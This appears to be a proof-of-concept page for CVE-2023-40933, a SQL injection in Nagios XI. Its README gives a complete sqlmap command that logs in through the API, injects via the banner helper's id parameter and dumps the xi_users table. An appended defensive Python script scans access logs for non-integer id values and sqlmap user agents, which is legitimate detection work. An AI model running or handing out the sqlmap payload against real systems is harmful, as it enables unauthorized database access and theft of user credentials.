CVE-2023-40933 PoC — Nagios XI SQL Injection Vulnerability

Associated Vulnerability
Title: Nagios XI SQL Injection Vulnerability (CVE-2023-40933)
Description: A SQL injection vulnerability in Nagios XI v5.11.1 and below allows authenticated attackers with announcement banner configuration privileges to execute arbitrary SQL commands via the ID parameter sent to the update_banner_message() function.
Description
The sqlmap payload to exploit CVE-2023-40933
Readme
# CVE-2023-40933
The sqlmap payload to exploit CVE-2023-40933

## Payload
Required Information:

- Valid Username and Password
- Domain and path of hosted instance

```
sqlmap -D nagiosxi -T xi_users -u "https://<INSTANCE>/nagiosxi/admin/banner_message-ajaxhelper.php?action=update_banner_message_settings&id=3&token=`curl -ksX POST https://<INSTANCE>/nagiosxi/api/v1/authenticate -d "username=<USERNAME>&password=<PASSWORD>&valid_min=1000" | awk -F'"' '{print$12}'`" --dump --level 4 --risk 3 -p id --batch
```
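
For defenders, the request shape above is easy to hunt for in web server logs. The following is an added example, not part of the original README or of Nagios XI: it scans access-log lines for calls to the banner helper whose `id` is not a plain integer. The combined log format, the function name `suspicious_requests` and the sample lines are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script and action names taken from the request URL shown above.
SCRIPT = "banner_message-ajaxhelper.php"
ACTION = "update_banner_message_settings"

# Assumption: the web server writes the Apache/Nginx "combined" access log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" \d{3} \S+'
    r'(?: "[^"]*" "(?P<ua>[^"]*)")?'
)

def suspicious_requests(lines):
    """Return (ip, timestamp, reasons) for banner-helper requests worth triage."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        params = parse_qs(url.query, keep_blank_values=True)  # URL-decodes values
        if not url.path.endswith("/" + SCRIPT) or ACTION not in params.get("action", []):
            continue
        ids = params.get("id", [])
        reasons = []
        # A legitimate banner id is a single plain ASCII integer.
        if len(ids) != 1 or not (ids[0].isascii() and ids[0].isdigit()):
            reasons.append("missing or non-integer id")
        # sqlmap identifies itself in the User-Agent unless the operator overrides it.
        if "sqlmap" in (m["ua"] or "").lower():
            reasons.append("sqlmap user agent")
        if reasons:
            hits.append((m["ip"], m["ts"], ", ".join(reasons)))
    return hits

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.5 - - [12/Sep/2023:10:01:02 +0000] "GET /nagiosxi/admin/' + SCRIPT
    + '?action=' + ACTION + '&id=3&token=REDACTED HTTP/1.1" 200 45 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Sep/2023:10:05:40 +0000] "GET /nagiosxi/admin/' + SCRIPT
    + '?action=' + ACTION + '&id=3%20AND%207%3D7&token=REDACTED HTTP/1.1" 200 45 "-" '
    '"sqlmap/1.7 (https://sqlmap.org)"',
    '203.0.113.5 - - [12/Sep/2023:10:06:11 +0000] "GET /nagiosxi/index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE):
        print(hit)
```

This only sees parameters carried in the query string, since request bodies are not written to a standard access log.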